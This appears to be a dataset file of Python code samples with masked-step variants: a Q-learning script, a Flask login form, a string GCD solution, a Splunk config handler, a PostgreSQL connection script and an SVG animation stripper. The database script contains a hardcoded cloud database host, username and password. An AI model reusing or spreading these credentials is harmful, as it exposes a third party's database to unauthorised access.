code (stringlengths 13-1.2M) | order_type (stringclasses 1 value) | original_example (dict) | step_ids (listlengths 1-5) |
---|---|---|---|
# link https://deeplizard.com/learn/video/QK_PP_2KgGE
import gym
import numpy as np
import random
import time
from IPython.display import clear_output

# setup the env
env = gym.make("FrozenLake8x8-v0", is_slippery=False)
observation = env.reset()

# setup the q-table
action_space_size = env.action_space.n
state_space_size = env.observation_space.n
q_table = np.zeros((state_space_size, action_space_size))
#print(q_table)

# instantiate hyper-parameters
num_episodes = 10000
steps_per_episodes = 100
learning_rate = 0.1
discount_rate = 0.99
exploration_rate = 1
max_exploration_rate = 1
min_exploration_rate = 0.01
exploration_decay_rate = 0.001

# empty list to hold our rewards over time
rewards_all_episodes = []

# main loop
for episode in range(num_episodes):
    state = env.reset()
    done = False
    rewards_current_episode = 0

    for step in range(steps_per_episodes):
        # exploration vs exploitation
        exploration_rate_threshold = random.uniform(0, 1)
        if exploration_rate_threshold > exploration_rate:
            action = np.argmax(q_table[state, :])
        else:
            action = env.action_space.sample()

        next_state, reward, done, info = env.step(action)
        #print(next_state)
        #print(q_table.shape)

        # update q-table
        q_table[state, action] = q_table[state, action] * (1 - learning_rate) + learning_rate * (reward + discount_rate * np.max(q_table[next_state, :]))

        state = next_state
        rewards_current_episode += reward

        if done == True:
            break

    # Exploration rate decay
    exploration_rate = min_exploration_rate + (max_exploration_rate - min_exploration_rate) * np.exp(-exploration_decay_rate * episode)
    rewards_all_episodes.append(rewards_current_episode)

# Calculate and print the average reward per thousand episodes
rewards_per_thousand_episodes = np.split(np.array(rewards_all_episodes), num_episodes / 1000)
count = 1000

print("********Average reward per thousand episodes********\n")
for r in rewards_per_thousand_episodes:
    print(count, ": ", str(sum(r / 1000)))
    count += 1000

# Print updated Q-table
print("\n\n********Q-table********\n")
print(q_table)
|
normal
|
{
"blob_id": "b791afec1c9fb214d1f3b4ec0ec67f905d96aabf",
"index": 3249,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor episode in range(num_episodes):\n state = env.reset()\n done = False\n rewards_current_episode = 0\n for step in range(steps_per_episodes):\n exploration_rate_threshold = random.uniform(0, 1)\n if exploration_rate_threshold > exploration_rate:\n action = np.argmax(q_table[state, :])\n else:\n action = env.action_space.sample()\n next_state, reward, done, info = env.step(action)\n q_table[state, action] = q_table[state, action] * (1 - learning_rate\n ) + learning_rate * (reward + discount_rate * np.max(q_table[\n next_state, :]))\n state = next_state\n rewards_current_episode += reward\n if done == True:\n break\n exploration_rate = min_exploration_rate + (max_exploration_rate -\n min_exploration_rate) * np.exp(-exploration_decay_rate * episode)\n rewards_all_episodes.append(rewards_current_episode)\n<mask token>\nprint('********Average reward per thousand episodes********\\n')\nfor r in rewards_per_thousand_episodes:\n print(count, ': ', str(sum(r / 1000)))\n count += 1000\nprint(\"\"\"\n\n********Q-table********\n\"\"\")\nprint(q_table)\n",
"step-3": "<mask token>\nenv = gym.make('FrozenLake8x8-v0', is_slippery=False)\nobservation = env.reset()\naction_space_size = env.action_space.n\nstate_space_size = env.observation_space.n\nq_table = np.zeros((state_space_size, action_space_size))\nnum_episodes = 10000\nsteps_per_episodes = 100\nlearning_rate = 0.1\ndiscount_rate = 0.99\nexploration_rate = 1\nmax_exploration_rate = 1\nmin_exploration_rate = 0.01\nexploration_decay_rate = 0.001\nrewards_all_episodes = []\nfor episode in range(num_episodes):\n state = env.reset()\n done = False\n rewards_current_episode = 0\n for step in range(steps_per_episodes):\n exploration_rate_threshold = random.uniform(0, 1)\n if exploration_rate_threshold > exploration_rate:\n action = np.argmax(q_table[state, :])\n else:\n action = env.action_space.sample()\n next_state, reward, done, info = env.step(action)\n q_table[state, action] = q_table[state, action] * (1 - learning_rate\n ) + learning_rate * (reward + discount_rate * np.max(q_table[\n next_state, :]))\n state = next_state\n rewards_current_episode += reward\n if done == True:\n break\n exploration_rate = min_exploration_rate + (max_exploration_rate -\n min_exploration_rate) * np.exp(-exploration_decay_rate * episode)\n rewards_all_episodes.append(rewards_current_episode)\nrewards_per_thousand_episodes = np.split(np.array(rewards_all_episodes), \n num_episodes / 1000)\ncount = 1000\nprint('********Average reward per thousand episodes********\\n')\nfor r in rewards_per_thousand_episodes:\n print(count, ': ', str(sum(r / 1000)))\n count += 1000\nprint(\"\"\"\n\n********Q-table********\n\"\"\")\nprint(q_table)\n",
"step-4": "import gym\nimport numpy as np\nimport random\nimport time\nfrom IPython.display import clear_output\nenv = gym.make('FrozenLake8x8-v0', is_slippery=False)\nobservation = env.reset()\naction_space_size = env.action_space.n\nstate_space_size = env.observation_space.n\nq_table = np.zeros((state_space_size, action_space_size))\nnum_episodes = 10000\nsteps_per_episodes = 100\nlearning_rate = 0.1\ndiscount_rate = 0.99\nexploration_rate = 1\nmax_exploration_rate = 1\nmin_exploration_rate = 0.01\nexploration_decay_rate = 0.001\nrewards_all_episodes = []\nfor episode in range(num_episodes):\n state = env.reset()\n done = False\n rewards_current_episode = 0\n for step in range(steps_per_episodes):\n exploration_rate_threshold = random.uniform(0, 1)\n if exploration_rate_threshold > exploration_rate:\n action = np.argmax(q_table[state, :])\n else:\n action = env.action_space.sample()\n next_state, reward, done, info = env.step(action)\n q_table[state, action] = q_table[state, action] * (1 - learning_rate\n ) + learning_rate * (reward + discount_rate * np.max(q_table[\n next_state, :]))\n state = next_state\n rewards_current_episode += reward\n if done == True:\n break\n exploration_rate = min_exploration_rate + (max_exploration_rate -\n min_exploration_rate) * np.exp(-exploration_decay_rate * episode)\n rewards_all_episodes.append(rewards_current_episode)\nrewards_per_thousand_episodes = np.split(np.array(rewards_all_episodes), \n num_episodes / 1000)\ncount = 1000\nprint('********Average reward per thousand episodes********\\n')\nfor r in rewards_per_thousand_episodes:\n print(count, ': ', str(sum(r / 1000)))\n count += 1000\nprint(\"\"\"\n\n********Q-table********\n\"\"\")\nprint(q_table)\n",
"step-5": "# link https://deeplizard.com/learn/video/QK_PP_2KgGE\nimport gym\nimport numpy as np\nimport random\nimport time\nfrom IPython.display import clear_output\n\n# setup the env\nenv = gym.make(\"FrozenLake8x8-v0\", is_slippery=False)\nobservation = env.reset()\n\n# setup the q-table\naction_space_size = env.action_space.n\nstate_space_size = env.observation_space.n\nq_table = np.zeros((state_space_size, action_space_size))\n#print(q_table)\n\n# instaniate hyper-parameters\nnum_episodes = 10000\nsteps_per_episodes = 100\nlearning_rate = 0.1\ndiscount_rate = 0.99\nexploration_rate = 1\nmax_exploration_rate = 1\nmin_exploration_rate = 0.01\nexploration_decay_rate = 0.001\n\n# empty list to hold our rewards over time\nrewards_all_episodes = []\n \n # main loops\nfor episode in range(num_episodes):\n state = env.reset()\n done = False\n rewards_current_episode = 0\n \n for step in range(steps_per_episodes):\n \n # exploration vs exploitation\n exploration_rate_threshold = random.uniform(0,1)\n if exploration_rate_threshold > exploration_rate:\n action = np.argmax(q_table[state,:])\n else:\n action = env.action_space.sample()\n \n next_state, reward, done, info = env.step(action)\n #print(next_state)\n #print(q_table.shape)\n\n # update q-table\n q_table[state, action] = q_table[state, action] * (1 - learning_rate) + learning_rate * (reward + discount_rate * np.max(q_table[next_state, :]))\n\n state = next_state\n rewards_current_episode += reward\n \n if done == True:\n break\n \n # Exploration rate decay\n exploration_rate = min_exploration_rate + (max_exploration_rate - min_exploration_rate) * np.exp(-exploration_decay_rate*episode)\n rewards_all_episodes.append(rewards_current_episode)\n\n# Calculate and print the average reward per thousand episodes\nrewards_per_thousand_episodes = np.split(np.array(rewards_all_episodes),num_episodes/1000)\ncount = 1000\n\nprint(\"********Average reward per thousand episodes********\\n\")\nfor r in rewards_per_thousand_episodes:\n print(count, \": \", str(sum(r/1000)))\n count += 1000\n\n# Print updated Q-table\nprint(\"\\n\\n********Q-table********\\n\")\nprint(q_table)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
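A minimal sketch, assuming the env, q_table, and old 4-tuple gym step API from the Q-learning sample above, of a purely greedy evaluation episode after training (illustrative only, not part of the original example):

# Hypothetical greedy rollout with the q_table trained in the sample above.
state = env.reset()
done = False
total_reward = 0
while not done:
    action = np.argmax(q_table[state, :])          # always exploit, no exploration
    state, reward, done, info = env.step(action)
    total_reward += reward
print("Greedy episode reward:", total_reward)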
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired
from flask_wtf import FlaskForm
# ...
class LoginForm(FlaskForm):
    """登录表单类"""
    username = StringField('用户名', validators=[DataRequired()])
    password = PasswordField('密码', validators=[DataRequired()])
|
normal
|
{
"blob_id": "6ad2014191215dac97ad6fc6a026512c3d1866dc",
"index": 8244,
"step-1": "<mask token>\n\n\nclass LoginForm(FlaskForm):\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass LoginForm(FlaskForm):\n <mask token>\n username = StringField('用户名', validators=[DataRequired()])\n password = PasswordField('密码', validators=[DataRequired()])\n",
"step-3": "<mask token>\n\n\nclass LoginForm(FlaskForm):\n \"\"\"登录表单类\"\"\"\n username = StringField('用户名', validators=[DataRequired()])\n password = PasswordField('密码', validators=[DataRequired()])\n",
"step-4": "from wtforms import StringField, PasswordField\nfrom wtforms.validators import DataRequired\nfrom flask_wtf import FlaskForm\n\n\nclass LoginForm(FlaskForm):\n \"\"\"登录表单类\"\"\"\n username = StringField('用户名', validators=[DataRequired()])\n password = PasswordField('密码', validators=[DataRequired()])\n",
"step-5": "from wtforms import StringField, PasswordField\nfrom wtforms.validators import DataRequired\nfrom flask_wtf import FlaskForm\n\n\n# ...\nclass LoginForm(FlaskForm):\n \"\"\"登录表单类\"\"\"\n username = StringField('用户名', validators=[DataRequired()])\n password = PasswordField('密码', validators=[DataRequired()])",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
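The LoginForm sample above only defines the form fields; a minimal sketch of a view that consumes it, assuming standard Flask-WTF behavior (the route, secret key, and template name here are illustrative, not from the original sample):

# Hypothetical view using LoginForm from the sample above.
from flask import Flask, render_template, redirect

app = Flask(__name__)
app.config['SECRET_KEY'] = 'change-me'   # Flask-WTF CSRF protection needs a secret key

@app.route('/login', methods=['GET', 'POST'])
def login():
    form = LoginForm()
    if form.validate_on_submit():        # POST request with both required fields present
        return redirect('/')
    return render_template('login.html', form=form)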
class Solution(object):
    def gcdOfStrings(self, str1, str2):
        if str1 == str2:
            return str1
        elif not str1 or not str2:
            return ''
        elif str1.startswith(str2):
            return self.gcdOfStrings(str1[len(str2):], str2)
        elif str2.startswith(str1):
            return self.gcdOfStrings(str1, str2[len(str1):])
        else:
            return ''
|
normal
|
{
"blob_id": "ab632c3c8a7f295a890de19af82fde87c6d600bc",
"index": 1674,
"step-1": "<mask token>\n",
"step-2": "class Solution(object):\n <mask token>\n",
"step-3": "class Solution(object):\n\n def gcdOfStrings(self, str1, str2):\n if str1 == str2:\n return str1\n elif not str1 or not str2:\n return ''\n elif str1.startswith(str2):\n return self.gcdOfStrings(str1[len(str2):], str2)\n elif str2.startswith(str1):\n return self.gcdOfStrings(str1, str2[len(str1):])\n else:\n return ''\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
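The gcdOfStrings sample above is the subtraction form of Euclid's algorithm applied to strings: the shorter string is repeatedly stripped from the front of the longer one until the two are equal (their common divisor) or neither is a prefix of the other (no divisor exists). A small illustrative check, with example inputs chosen here, assuming the Solution class above is in scope:

# Illustrative usage of the Solution class above (example strings are hypothetical).
s = Solution()
print(s.gcdOfStrings("ABABAB", "ABAB"))  # prints "AB": both strings are repeats of "AB"
print(s.gcdOfStrings("LEET", "CODE"))    # prints "": no common repeating unit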
import splunk.admin as admin
import splunk.entity as en
class ConfigApp(admin.MConfigHandler):
    def setup(self):
        if self.requestedAction == admin.ACTION_EDIT:
            for myarg in ['api_key']:
                self.supportedArgs.addOptArg(myarg)

    def handleList(self, confInfo):
        confDict = self.readConf("appsetup")
        if None != confDict:
            for stanza, settings in confDict.items():
                for key, val in settings.items():
                    if key in ['api_key'] and val in [None, '']:
                        val = ''
                    confInfo[stanza].append(key, val)

    def handleEdit(self, confInfo):
        name = self.callerArgs.id
        args = self.callerArgs
        self.writeConf('appsetup', 'app_config', self.callerArgs.data)
admin.init(ConfigApp, admin.CONTEXT_NONE)
|
normal
|
{
"blob_id": "8d6c58e9ef4e14a089a7eb33a92214d081ed7692",
"index": 8462,
"step-1": "<mask token>\n\n\nclass ConfigApp(admin.MConfigHandler):\n <mask token>\n\n def handleList(self, confInfo):\n confDict = self.readConf('appsetup')\n if None != confDict:\n for stanza, settings in confDict.items():\n for key, val in settings.items():\n if key in ['api_key'] and val in [None, '']:\n val = ''\n confInfo[stanza].append(key, val)\n\n def handleEdit(self, confInfo):\n name = self.callerArgs.id\n args = self.callerArgs\n self.writeConf('appsetup', 'app_config', self.callerArgs.data)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ConfigApp(admin.MConfigHandler):\n\n def setup(self):\n if self.requestedAction == admin.ACTION_EDIT:\n for myarg in ['api_key']:\n self.supportedArgs.addOptArg(myarg)\n\n def handleList(self, confInfo):\n confDict = self.readConf('appsetup')\n if None != confDict:\n for stanza, settings in confDict.items():\n for key, val in settings.items():\n if key in ['api_key'] and val in [None, '']:\n val = ''\n confInfo[stanza].append(key, val)\n\n def handleEdit(self, confInfo):\n name = self.callerArgs.id\n args = self.callerArgs\n self.writeConf('appsetup', 'app_config', self.callerArgs.data)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ConfigApp(admin.MConfigHandler):\n\n def setup(self):\n if self.requestedAction == admin.ACTION_EDIT:\n for myarg in ['api_key']:\n self.supportedArgs.addOptArg(myarg)\n\n def handleList(self, confInfo):\n confDict = self.readConf('appsetup')\n if None != confDict:\n for stanza, settings in confDict.items():\n for key, val in settings.items():\n if key in ['api_key'] and val in [None, '']:\n val = ''\n confInfo[stanza].append(key, val)\n\n def handleEdit(self, confInfo):\n name = self.callerArgs.id\n args = self.callerArgs\n self.writeConf('appsetup', 'app_config', self.callerArgs.data)\n\n\nadmin.init(ConfigApp, admin.CONTEXT_NONE)\n",
"step-4": "import splunk.admin as admin\nimport splunk.entity as en\n\n\nclass ConfigApp(admin.MConfigHandler):\n\n def setup(self):\n if self.requestedAction == admin.ACTION_EDIT:\n for myarg in ['api_key']:\n self.supportedArgs.addOptArg(myarg)\n\n def handleList(self, confInfo):\n confDict = self.readConf('appsetup')\n if None != confDict:\n for stanza, settings in confDict.items():\n for key, val in settings.items():\n if key in ['api_key'] and val in [None, '']:\n val = ''\n confInfo[stanza].append(key, val)\n\n def handleEdit(self, confInfo):\n name = self.callerArgs.id\n args = self.callerArgs\n self.writeConf('appsetup', 'app_config', self.callerArgs.data)\n\n\nadmin.init(ConfigApp, admin.CONTEXT_NONE)\n",
"step-5": "import splunk.admin as admin\nimport splunk.entity as en\n \nclass ConfigApp(admin.MConfigHandler):\n\tdef setup(self):\n\t\tif self.requestedAction == admin.ACTION_EDIT:\n\t\t\tfor myarg in ['api_key']:\n\t\t\t\tself.supportedArgs.addOptArg(myarg)\n \n\tdef handleList(self, confInfo):\n\t\tconfDict = self.readConf(\"appsetup\")\n\t\tif None != confDict:\n\t\t\tfor stanza, settings in confDict.items():\n\t\t\t\tfor key, val in settings.items():\n\t\t\t\t\tif key in ['api_key'] and val in [None, '']:\n\t\t\t\t\t\tval = ''\n\t\t\t\t\tconfInfo[stanza].append(key, val)\n \n\tdef handleEdit(self, confInfo):\n\t\tname = self.callerArgs.id\n\t\targs = self.callerArgs\n\t\tself.writeConf('appsetup', 'app_config', self.callerArgs.data)\n \nadmin.init(ConfigApp, admin.CONTEXT_NONE)\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
import psycopg2
host = "datavis.cauuh8vzeelb.us-east-1.rds.amazonaws.com"
database = "top5"
user = "teamwonder"
password = "visproject"
Gentrifying = [10002,10003,10009,10026,10027,10029,10030,10031,10032,10033,10034,10035,10037,10039,10040,10454,10455,10456,10457,10458,10459,10460,10474,11102,11103,11105,11106,11206,11211,11212,11213,11216,11220,11221,11222,11225,11232,11233,11237,11249,11370]
Non_Gentrifying = [10451,10452,10453,10463,10468,10472,10473,11204,11208,11214,11223,11224,11239]
Higher_Income = [83,7020,7030,7114,10000,10001,10004,10005,10006,10007,10010,10011,10012,10013,10014,10016,10017,10018,10019,10020,10021,10022,10023,10024,10025,10028,10036,10038,10041,10044,10045,10048,10055,10065,10069,10075,10103,10104,10105,10107,10111,10112,10118,10119,10120,10121,10122,10123,10128,10129,10153,10154,10155,10158,10162,10165,10166,10167,10168,10169,10170,10171,10172,10173,10177,10178,10179,10270,10271,10278,10279,10280,10281,10282,10301,10302,10303,10304,10305,10306,10307,10308,10309,10310,10312,10314,10461,10462,10464,10465,10466,10467,10469,10470,10471,10475,10507,10704,10803,11001,11004,11005,11040,11101,11104,11109,11201,11203,11205,11207,11209,11210,11215,11217,11218,11219,11226,11228,11229,11230,11231,11234,11235,11236,11238,11241,11242,11251,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365,11366,11367,11368,11369,11371,11372,11373,11374,11375,11377,11378,11379,11385,11411,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11426,11427,11428,11429,11430,11432,11433,11434,11435,11436,11530,11691,11692,11693,11694,11695,11697]
con = psycopg2.connect(host=host, database=database, user=user, password=password)
cur = con.cursor()
|
normal
|
{
"blob_id": "0ebf5646ee9693b7d0c1de61436e05b3725b2c9f",
"index": 2560,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nhost = 'datavis.cauuh8vzeelb.us-east-1.rds.amazonaws.com'\ndatabase = 'top5'\nuser = 'teamwonder'\npassword = 'visproject'\nGentrifying = [10002, 10003, 10009, 10026, 10027, 10029, 10030, 10031, \n 10032, 10033, 10034, 10035, 10037, 10039, 10040, 10454, 10455, 10456, \n 10457, 10458, 10459, 10460, 10474, 11102, 11103, 11105, 11106, 11206, \n 11211, 11212, 11213, 11216, 11220, 11221, 11222, 11225, 11232, 11233, \n 11237, 11249, 11370]\nNon_Gentrifying = [10451, 10452, 10453, 10463, 10468, 10472, 10473, 11204, \n 11208, 11214, 11223, 11224, 11239]\nHigher_Income = [83, 7020, 7030, 7114, 10000, 10001, 10004, 10005, 10006, \n 10007, 10010, 10011, 10012, 10013, 10014, 10016, 10017, 10018, 10019, \n 10020, 10021, 10022, 10023, 10024, 10025, 10028, 10036, 10038, 10041, \n 10044, 10045, 10048, 10055, 10065, 10069, 10075, 10103, 10104, 10105, \n 10107, 10111, 10112, 10118, 10119, 10120, 10121, 10122, 10123, 10128, \n 10129, 10153, 10154, 10155, 10158, 10162, 10165, 10166, 10167, 10168, \n 10169, 10170, 10171, 10172, 10173, 10177, 10178, 10179, 10270, 10271, \n 10278, 10279, 10280, 10281, 10282, 10301, 10302, 10303, 10304, 10305, \n 10306, 10307, 10308, 10309, 10310, 10312, 10314, 10461, 10462, 10464, \n 10465, 10466, 10467, 10469, 10470, 10471, 10475, 10507, 10704, 10803, \n 11001, 11004, 11005, 11040, 11101, 11104, 11109, 11201, 11203, 11205, \n 11207, 11209, 11210, 11215, 11217, 11218, 11219, 11226, 11228, 11229, \n 11230, 11231, 11234, 11235, 11236, 11238, 11241, 11242, 11251, 11354, \n 11355, 11356, 11357, 11358, 11359, 11360, 11361, 11362, 11363, 11364, \n 11365, 11366, 11367, 11368, 11369, 11371, 11372, 11373, 11374, 11375, \n 11377, 11378, 11379, 11385, 11411, 11412, 11413, 11414, 11415, 11416, \n 11417, 11418, 11419, 11420, 11421, 11422, 11423, 11426, 11427, 11428, \n 11429, 11430, 11432, 11433, 11434, 11435, 11436, 11530, 11691, 11692, \n 11693, 11694, 11695, 11697]\ncon = psycopg2.connect(host=host, database=database, user=user, password=\n password)\ncur = con.cursor()\n",
"step-3": "import psycopg2\nhost = 'datavis.cauuh8vzeelb.us-east-1.rds.amazonaws.com'\ndatabase = 'top5'\nuser = 'teamwonder'\npassword = 'visproject'\nGentrifying = [10002, 10003, 10009, 10026, 10027, 10029, 10030, 10031, \n 10032, 10033, 10034, 10035, 10037, 10039, 10040, 10454, 10455, 10456, \n 10457, 10458, 10459, 10460, 10474, 11102, 11103, 11105, 11106, 11206, \n 11211, 11212, 11213, 11216, 11220, 11221, 11222, 11225, 11232, 11233, \n 11237, 11249, 11370]\nNon_Gentrifying = [10451, 10452, 10453, 10463, 10468, 10472, 10473, 11204, \n 11208, 11214, 11223, 11224, 11239]\nHigher_Income = [83, 7020, 7030, 7114, 10000, 10001, 10004, 10005, 10006, \n 10007, 10010, 10011, 10012, 10013, 10014, 10016, 10017, 10018, 10019, \n 10020, 10021, 10022, 10023, 10024, 10025, 10028, 10036, 10038, 10041, \n 10044, 10045, 10048, 10055, 10065, 10069, 10075, 10103, 10104, 10105, \n 10107, 10111, 10112, 10118, 10119, 10120, 10121, 10122, 10123, 10128, \n 10129, 10153, 10154, 10155, 10158, 10162, 10165, 10166, 10167, 10168, \n 10169, 10170, 10171, 10172, 10173, 10177, 10178, 10179, 10270, 10271, \n 10278, 10279, 10280, 10281, 10282, 10301, 10302, 10303, 10304, 10305, \n 10306, 10307, 10308, 10309, 10310, 10312, 10314, 10461, 10462, 10464, \n 10465, 10466, 10467, 10469, 10470, 10471, 10475, 10507, 10704, 10803, \n 11001, 11004, 11005, 11040, 11101, 11104, 11109, 11201, 11203, 11205, \n 11207, 11209, 11210, 11215, 11217, 11218, 11219, 11226, 11228, 11229, \n 11230, 11231, 11234, 11235, 11236, 11238, 11241, 11242, 11251, 11354, \n 11355, 11356, 11357, 11358, 11359, 11360, 11361, 11362, 11363, 11364, \n 11365, 11366, 11367, 11368, 11369, 11371, 11372, 11373, 11374, 11375, \n 11377, 11378, 11379, 11385, 11411, 11412, 11413, 11414, 11415, 11416, \n 11417, 11418, 11419, 11420, 11421, 11422, 11423, 11426, 11427, 11428, \n 11429, 11430, 11432, 11433, 11434, 11435, 11436, 11530, 11691, 11692, \n 11693, 11694, 11695, 11697]\ncon = psycopg2.connect(host=host, database=database, user=user, password=\n password)\ncur = con.cursor()\n",
"step-4": "import psycopg2\n\nhost = \"datavis.cauuh8vzeelb.us-east-1.rds.amazonaws.com\"\ndatabase = \"top5\"\nuser = \"teamwonder\"\npassword = \"visproject\"\n\nGentrifying = [10002,10003,10009,10026,10027,10029,10030,10031,10032,10033,10034,10035,10037,10039,10040,10454,10455,10456,10457,10458,10459,10460,10474,11102,11103,11105,11106,11206,11211,11212,11213,11216,11220,11221,11222,11225,11232,11233,11237,11249,11370]\nNon_Gentrifying = [10451,10452,10453,10463,10468,10472,10473,11204,11208,11214,11223,11224,11239]\nHigher_Income = [83,7020,7030,7114,10000,10001,10004,10005,10006,10007,10010,10011,10012,10013,10014,10016,10017,10018,10019,10020,10021,10022,10023,10024,10025,10028,10036,10038,10041,10044,10045,10048,10055,10065,10069,10075,10103,10104,10105,10107,10111,10112,10118,10119,10120,10121,10122,10123,10128,10129,10153,10154,10155,10158,10162,10165,10166,10167,10168,10169,10170,10171,10172,10173,10177,10178,10179,10270,10271,10278,10279,10280,10281,10282,10301,10302,10303,10304,10305,10306,10307,10308,10309,10310,10312,10314,10461,10462,10464,10465,10466,10467,10469,10470,10471,10475,10507,10704,10803,11001,11004,11005,11040,11101,11104,11109,11201,11203,11205,11207,11209,11210,11215,11217,11218,11219,11226,11228,11229,11230,11231,11234,11235,11236,11238,11241,11242,11251,11354,11355,11356,11357,11358,11359,11360,11361,11362,11363,11364,11365,11366,11367,11368,11369,11371,11372,11373,11374,11375,11377,11378,11379,11385,11411,11412,11413,11414,11415,11416,11417,11418,11419,11420,11421,11422,11423,11426,11427,11428,11429,11430,11432,11433,11434,11435,11436,11530,11691,11692,11693,11694,11695,11697]\n\ncon = psycopg2.connect(host=host, database=database, user=user, password=password)\ncur = con.cursor()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
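The psycopg2 sample above stops right after creating the cursor; a hedged sketch of a follow-up query, assuming the con, cur, and zip-code lists from that sample (the rents table and its columns are invented for illustration):

# Hypothetical query reusing con/cur from the snippet above. psycopg2 adapts a Python
# list to a SQL array, so ANY(%s) filters on the zip-code lists defined earlier.
cur.execute("SELECT zipcode, median_rent FROM rents WHERE zipcode = ANY(%s)", (Gentrifying,))
for zipcode, median_rent in cur.fetchall():
    print(zipcode, median_rent)
cur.close()
con.close()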
#!/usr/bin/env python3
# -*- coding: ascii -*-
"""
A script removing animations from SVG graphics.
"""
import sys, os, re
# etree fails utterly at producing nice-looking XML
from xml.dom import minidom
def process(inpt, outp):
    def traverse(node):
        for child in node.childNodes:
            if child.nodeType != minidom.Node.ELEMENT_NODE:
                continue
            elif child.tagName in ('animate', 'animateTransform'):
                node.removeChild(child)
            elif child.tagName in ('style', 'script'):
                if child.getAttribute('key') == 'animation':
                    node.removeChild(child)
            else:
                traverse(child)
        node.normalize()
        if len(node.childNodes) == 0: return
        for child in (node.childNodes[0], node.childNodes[-1]):
            if child.nodeType != minidom.Node.TEXT_NODE:
                continue
            if not child.data.isspace() or child.data.count('\n') <= 1:
                continue
            if len(node.childNodes) == 1:
                node.removeChild(child)
                return
            child.data = re.sub(r'\n.*\n', r'\n', child.data)
    document = minidom.parse(inpt)
    traverse(document.documentElement)
    outp.write('<?xml version="1.0" encoding="utf-8"?>\n')
    document.documentElement.writexml(outp)
    outp.write('\n')

def main():
    if len(sys.argv) != 3:
        sys.stderr.write('USAGE: %s input output\n' % sys.argv[0])
        sys.stderr.flush()
        sys.exit(0)
    with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:
        process(inpt, outp)
if __name__ == '__main__': main()
|
normal
|
{
"blob_id": "f819d1b1f2f6f3052247cda592007eac40aca37a",
"index": 7927,
"step-1": "<mask token>\n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef process(inpt, outp):\n\n def traverse(node):\n for child in node.childNodes:\n if child.nodeType != minidom.Node.ELEMENT_NODE:\n continue\n elif child.tagName in ('animate', 'animateTransform'):\n node.removeChild(child)\n elif child.tagName in ('style', 'script'):\n if child.getAttribute('key') == 'animation':\n node.removeChild(child)\n else:\n traverse(child)\n node.normalize()\n if len(node.childNodes) == 0:\n return\n for child in (node.childNodes[0], node.childNodes[-1]):\n if child.nodeType != minidom.Node.TEXT_NODE:\n continue\n if not child.data.isspace() or child.data.count('\\n') <= 1:\n continue\n if len(node.childNodes) == 1:\n node.removeChild(child)\n return\n child.data = re.sub('\\\\n.*\\\\n', '\\\\n', child.data)\n document = minidom.parse(inpt)\n traverse(document.documentElement)\n outp.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n')\n document.documentElement.writexml(outp)\n outp.write('\\n')\n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef process(inpt, outp):\n\n def traverse(node):\n for child in node.childNodes:\n if child.nodeType != minidom.Node.ELEMENT_NODE:\n continue\n elif child.tagName in ('animate', 'animateTransform'):\n node.removeChild(child)\n elif child.tagName in ('style', 'script'):\n if child.getAttribute('key') == 'animation':\n node.removeChild(child)\n else:\n traverse(child)\n node.normalize()\n if len(node.childNodes) == 0:\n return\n for child in (node.childNodes[0], node.childNodes[-1]):\n if child.nodeType != minidom.Node.TEXT_NODE:\n continue\n if not child.data.isspace() or child.data.count('\\n') <= 1:\n continue\n if len(node.childNodes) == 1:\n node.removeChild(child)\n return\n child.data = re.sub('\\\\n.*\\\\n', '\\\\n', child.data)\n document = minidom.parse(inpt)\n traverse(document.documentElement)\n outp.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n')\n document.documentElement.writexml(outp)\n outp.write('\\n')\n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n process(inpt, outp)\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport sys, os, re\nfrom xml.dom import minidom\n\n\ndef process(inpt, outp):\n\n def traverse(node):\n for child in node.childNodes:\n if child.nodeType != minidom.Node.ELEMENT_NODE:\n continue\n elif child.tagName in ('animate', 'animateTransform'):\n node.removeChild(child)\n elif child.tagName in ('style', 'script'):\n if child.getAttribute('key') == 'animation':\n node.removeChild(child)\n else:\n traverse(child)\n node.normalize()\n if len(node.childNodes) == 0:\n return\n for child in (node.childNodes[0], node.childNodes[-1]):\n if child.nodeType != minidom.Node.TEXT_NODE:\n continue\n if not child.data.isspace() or child.data.count('\\n') <= 1:\n continue\n if len(node.childNodes) == 1:\n node.removeChild(child)\n return\n child.data = re.sub('\\\\n.*\\\\n', '\\\\n', child.data)\n document = minidom.parse(inpt)\n traverse(document.documentElement)\n outp.write('<?xml version=\"1.0\" encoding=\"utf-8\"?>\\n')\n document.documentElement.writexml(outp)\n outp.write('\\n')\n\n\ndef main():\n if len(sys.argv) != 3:\n sys.stderr.write('USAGE: %s input output\\n' % sys.argv[0])\n sys.stderr.flush()\n sys.exit(0)\n with open(sys.argv[1]) as inpt, open(sys.argv[2], 'w') as outp:\n 